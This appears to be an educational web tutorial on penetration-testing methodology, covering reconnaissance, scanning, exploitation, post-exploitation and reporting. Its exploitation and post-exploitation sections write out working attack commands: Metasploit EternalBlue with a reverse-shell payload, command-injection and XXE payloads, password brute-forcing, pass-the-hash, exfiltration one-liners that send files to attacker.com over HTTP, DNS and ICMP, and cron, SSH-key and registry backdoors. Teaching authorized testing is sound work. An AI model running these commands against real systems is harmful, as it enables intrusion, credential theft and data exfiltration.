Key Takeaways

  • Penetration testing follows a structured methodology: Recon → Scanning → Exploitation → Post-Exploitation → Reporting.
  • Proper scoping and written authorization are legally essential before any testing.
  • 80% of pentesting is reconnaissance—the more you know, the easier exploitation becomes.
  • Documentation throughout the engagement is crucial for professional reports.
  • Post-exploitation demonstrates real-world impact beyond initial access.
  • The report is what the client pays for—make it actionable and clear.
Table of Contents

1. What is Penetration Testing?

Penetration testing, commonly known as "pentesting" or "ethical hacking," is a simulated cyberattack against a computer system, network, or web application to identify security vulnerabilities that an attacker could exploit. Unlike malicious hackers, penetration testers operate with explicit permission and aim to help organizations strengthen their security posture.

The goal of a penetration test is not just to find vulnerabilities, but to demonstrate their real-world impact. Finding a SQL injection is interesting; showing that it leads to complete database access and customer data theft is what drives remediation budgets and executive attention.

Penetration Testing vs. Vulnerability Assessment

Vulnerability Assessment: Identifies and lists vulnerabilities. Automated scanners do most of the work. Results are theoretical—"this could be exploited."

Penetration Testing: Actively exploits vulnerabilities to prove impact. Human expertise is essential. Results are practical—"here's the data I accessed."

Organizations conduct penetration tests for various reasons:

2. Types of Penetration Tests

2.1 By Knowledge Level

Black Box

No prior knowledge. Simulates external attacker. Most realistic but time-consuming.

Gray Box

Partial knowledge (credentials, architecture). Simulates insider or compromised account.

White Box

Full knowledge (source code, network diagrams). Most thorough but less realistic.

2.2 By Target

3. The Penetration Testing Methodology

Professional penetration testing follows established frameworks. The most widely adopted include:

Regardless of framework, penetration testing follows five core phases:

1 Reconnaissance — Gather information about the target
2 Scanning & Enumeration — Identify live hosts, open ports, services
3 Exploitation — Attempt to exploit identified vulnerabilities
4 Post-Exploitation — Maintain access, pivot, escalate privileges
5 Reporting — Document findings with actionable recommendations

4. Phase 1: Reconnaissance

Reconnaissance (recon) is the foundation of any successful penetration test. The more information you gather, the more attack vectors you'll identify. Professional pentesters spend significant time on this phase—sometimes 40-60% of the entire engagement.

4.1 Passive Reconnaissance

Passive recon gathers information without directly interacting with the target, avoiding detection:

# WHOIS lookup
whois example.com

# DNS enumeration
dig example.com ANY
dig example.com MX
dig example.com NS
host -t ns example.com

# Subdomain discovery
subfinder -d example.com
amass enum -passive -d example.com
assetfinder --subs-only example.com

# Google dorking
site:example.com filetype:pdf
site:example.com inurl:admin
site:example.com intitle:"index of"
site:example.com ext:sql | ext:db | ext:log

# Shodan
shodan search hostname:example.com
shodan search org:"Target Company"

# Certificate transparency logs
crt.sh/?q=%.example.com

# Wayback Machine (historical data)
waybackurls example.com

# GitHub/GitLab secrets
trufflehog git https://github.com/target/repo
gitleaks detect --source=/path/to/repo

4.2 Active Reconnaissance

Active recon directly interacts with the target and may be detected:

# DNS zone transfer attempt
dig axfr @ns1.example.com example.com

# Active subdomain brute-forcing
gobuster dns -d example.com -w /usr/share/wordlists/subdomains.txt

# Web technology fingerprinting
whatweb https://example.com
wappalyzer https://example.com

# Directory enumeration
gobuster dir -u https://example.com -w /usr/share/wordlists/dirb/common.txt
feroxbuster -u https://example.com -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt

# Spider the website
gospider -s https://example.com -d 3

# Collect emails
theHarvester -d example.com -b all
OSINT Resources
  • Shodan: Search engine for internet-connected devices
  • Censys: Internet-wide scanning data
  • SecurityTrails: Historical DNS and WHOIS data
  • Hunter.io: Email address discovery
  • LinkedIn: Employee names and roles (for social engineering)

5. Phase 2: Scanning & Enumeration

5.1 Network Scanning with Nmap

# Host discovery
nmap -sn 192.168.1.0/24

# Full TCP port scan
nmap -sV -sC -p- -T4 target.com -oA full_scan

# Aggressive scan (noisy but comprehensive)
nmap -A -T4 target.com

# UDP scan (slow but important)
nmap -sU --top-ports 100 target.com

# Vulnerability scanning with NSE scripts
nmap --script vuln target.com
nmap --script smb-vuln* target.com

# OS detection
nmap -O target.com

# Fragmented packets (evasion)
nmap -f target.com

# Decoy scan (evasion)
nmap -D RND:10 target.com

5.2 Service Enumeration

# SMB enumeration
smbclient -L //target.com -N
enum4linux -a target.com
crackmapexec smb target.com --shares

# SNMP enumeration
snmpwalk -v2c -c public target.com
onesixtyone -c community.txt target.com

# LDAP enumeration
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com"

# DNS enumeration
dnsrecon -d example.com -t std

# FTP enumeration
nmap --script ftp-anon,ftp-bounce target.com

# SSH enumeration
nmap --script ssh2-enum-algos,ssh-auth-methods target.com

5.3 Web Application Scanning

# Nikto web scanner
nikto -h https://target.com

# Nuclei vulnerability scanner
nuclei -u https://target.com -t nuclei-templates/

# SQLMap for SQL injection
sqlmap -u "https://target.com/page?id=1" --dbs

# WPScan for WordPress
wpscan --url https://target.com --enumerate ap,at,u

# Burp Suite (GUI)
# - Spider the application
# - Active scan for vulnerabilities
# - Manual testing with Repeater/Intruder

6. Phase 3: Exploitation

Exploitation is where theory meets practice. You attempt to leverage discovered vulnerabilities to gain unauthorized access. Always maintain detailed notes—every command, every output.

6.1 Metasploit Framework

# Start Metasploit
msfconsole

# Search for exploits
search type:exploit name:smb
search cve:2017-0144

# Use an exploit
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.10
set LHOST 192.168.1.5
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit

# Post-exploitation with Meterpreter
meterpreter> sysinfo
meterpreter> getuid
meterpreter> getsystem
meterpreter> hashdump
meterpreter> download /etc/passwd

6.2 Web Application Exploitation

# SQL Injection
sqlmap -u "https://target.com/page?id=1" --dbs --dump

# Command Injection
; whoami
| id
`id`
$(whoami)

# File Upload Bypass
# Rename shell.php to shell.php.jpg
# Use null byte: shell.php%00.jpg
# Change Content-Type to image/jpeg

# SSRF Exploitation
?url=http://169.254.169.254/latest/meta-data/
?url=file:///etc/passwd

# XXE Exploitation
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>

6.3 Password Attacks

# Hydra brute force
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://target.com
hydra -L users.txt -P passwords.txt target.com http-post-form "/login:username=^USER^&password=^PASS^:Invalid"

# Hashcat password cracking
hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt  # MD5
hashcat -m 1000 hashes.txt rockyou.txt  # NTLM
hashcat -m 3200 hashes.txt rockyou.txt  # bcrypt

# John the Ripper
john --wordlist=rockyou.txt hashes.txt
john --format=NT hashes.txt
Exploitation Ethics

Always stay within scope. Document every action. If you accidentally access out-of-scope systems, stop immediately and report it. Never modify or delete data unless explicitly authorized. Maintain professionalism—you're being trusted with sensitive access.

7. Phase 4: Post-Exploitation

Post-exploitation demonstrates the full impact of a breach. It answers: "What can an attacker do after getting initial access?"

7.1 Privilege Escalation

# Linux privilege escalation
sudo -l  # Check sudo permissions
find / -perm -4000 2>/dev/null  # Find SUID binaries
cat /etc/crontab  # Check cron jobs
# Run LinPEAS for comprehensive enumeration
./linpeas.sh

# Windows privilege escalation
whoami /all
systeminfo
# Run WinPEAS
.\winpeas.exe

# Potato attacks (Windows)
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -t *
PrintSpoofer.exe -i -c cmd

7.2 Lateral Movement

# Pass-the-Hash with Impacket
psexec.py -hashes :NTLM_HASH [email protected]
wmiexec.py -hashes :NTLM_HASH [email protected]

# CrackMapExec for mass exploitation
crackmapexec smb 192.168.1.0/24 -u admin -H NTLM_HASH
crackmapexec smb 192.168.1.0/24 -u admin -H NTLM_HASH --sam

# Evil-WinRM
evil-winrm -i 192.168.1.10 -u admin -H NTLM_HASH

# PsExec with Sysinternals
psexec \\192.168.1.10 -u domain\admin -p password cmd

7.3 Data Exfiltration

# Search for sensitive files
# Windows
dir /s *password* *credential* *.kdbx *.key
findstr /si password *.xml *.ini *.txt *.config

# Linux
find / -name "*.conf" -o -name "*.config" -o -name "*.db" 2>/dev/null
grep -r "password" /var/www/ 2>/dev/null

# Exfiltrate via various channels
# HTTP
curl -X POST -d @sensitive.txt https://attacker.com/upload

# DNS (for when HTTP is blocked)
cat /etc/passwd | base64 | xxd -p | while read line; do dig $line.attacker.com; done

# ICMP
hping3 --icmp attacker.com -d 100 -E /etc/passwd

7.4 Persistence (If Authorized)

# Linux persistence
# Add SSH key
echo "ssh-rsa ATTACKER_KEY" >> ~/.ssh/authorized_keys

# Cron job
echo "* * * * * /tmp/backdoor.sh" >> /var/spool/cron/crontabs/root

# Windows persistence
# Scheduled task
schtasks /create /tn "Backdoor" /tr "C:\backdoor.exe" /sc onlogon

# Registry run key
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Backdoor /t REG_SZ /d "C:\backdoor.exe"

8. Phase 5: Reporting

The report is the deliverable the client pays for. A well-written report drives remediation; a poor report sits unread. Professional reports include:

8.1 Report Structure

  1. Executive Summary — Non-technical overview for leadership (1-2 pages)
    • Overall risk rating
    • Key findings summary
    • Critical recommendations
  2. Scope & Methodology — What was tested and how
    • IP ranges, URLs, applications tested
    • Testing methodology (PTES, OWASP)
    • Tools used
    • Testing dates and timeline
  3. Findings — Detailed vulnerability descriptions
    • Vulnerability title
    • Risk rating (Critical/High/Medium/Low/Info)
    • Description
    • Evidence (screenshots, code snippets)
    • Impact analysis
    • Remediation recommendations
    • References (CVE, CWE, OWASP)
  4. Appendices — Supporting technical data
    • Full tool outputs
    • Exploitation steps
    • Remediation resources

8.2 Risk Rating

Use a consistent risk rating system. CVSS (Common Vulnerability Scoring System) is widely accepted:

RatingCVSS ScoreRemediation Timeline
Critical9.0 - 10.0Immediate (24-48 hours)
High7.0 - 8.9Urgent (1-2 weeks)
Medium4.0 - 6.9Standard (1-3 months)
Low0.1 - 3.9Opportunistic (next cycle)
Info0.0Consider for improvement
Reporting Best Practices
  • Include screenshots — Visual evidence is compelling
  • Write for your audience — Executive summary for leaders, technical details for developers
  • Provide clear remediation steps — Don't just identify problems, solve them
  • Be accurate — False positives damage credibility
  • Proofread — Professional presentation matters

9. Essential Pentesting Tools

9.1 Operating Systems

Kali Linux
Industry standard
Parrot OS
Lightweight alternative
BlackArch
Arch-based, 2800+ tools
Commando VM
Windows-based pentest

9.2 Core Tools by Category

Reconnaissance:

Web Application Testing:

Exploitation:

Password Attacks:

10. Career & Certifications

10.1 Certification Path

Entry Level:

CompTIA Security+ CEH (Certified Ethical Hacker) eJPT (eLearnSecurity)

Intermediate:

OSCP (Offensive Security) PNPT (TCM Security) eCPPT (eLearnSecurity)

Advanced:

OSEP OSWE GPEN/GXPN (SANS) CRTO (Red Team Ops)

10.2 Career Paths

Salaries vary significantly by location, company size, and specialization. Bug bounty hunting can supplement income—top hunters earn $200,000+ annually from bounties alone.

10.3 How to Practice

Frequently Asked Questions

Do I need a degree to become a penetration tester?
No. While a CS degree helps, certifications (especially OSCP) and practical skills demonstrated through platforms like HackTheBox matter more. Many successful pentesters are self-taught. Build a portfolio, contribute to open-source security tools, and write about your learning.
Is penetration testing legal?
Only with explicit written authorization! Unauthorized testing is a crime in most jurisdictions. Professional pentesters always work under formal contracts (Rules of Engagement, Statement of Work) that define scope, timing, and emergency contacts. When in doubt, don't test.
Which programming languages should I learn?
Python is essential—most security tools are written in it, and you'll write your own scripts. Bash/PowerShell for system automation. JavaScript for web testing. Go and Rust are increasingly popular for offensive tooling. SQL for database attacks. Understanding C helps with binary exploitation.
What's the difference between pentesting and red teaming?
Penetration testing focuses on finding vulnerabilities within a defined scope, typically in a short timeframe. Red teaming simulates realistic adversaries over extended periods, including physical security, social engineering, and testing detection/response capabilities. Red teams often have broader goals like "access the CEO's email" rather than "test this web app."

Conclusion

Penetration testing is a rewarding but demanding field that combines technical expertise with creative thinking. Following a structured methodology—from thorough reconnaissance through professional reporting—separates amateurs from professionals.

Remember: the goal isn't to break things; it's to help organizations understand and fix their security weaknesses before real attackers exploit them. The best pentesters are problem-solvers who think like attackers but work for defenders.

Start with foundational skills, practice relentlessly on legal platforms, pursue certifications that challenge you (OSCP is the gold standard), and never stop learning. The security landscape evolves constantly, and so must you.

Continue Learning:
Windows PrivEsc Linux PrivEsc Active Directory Security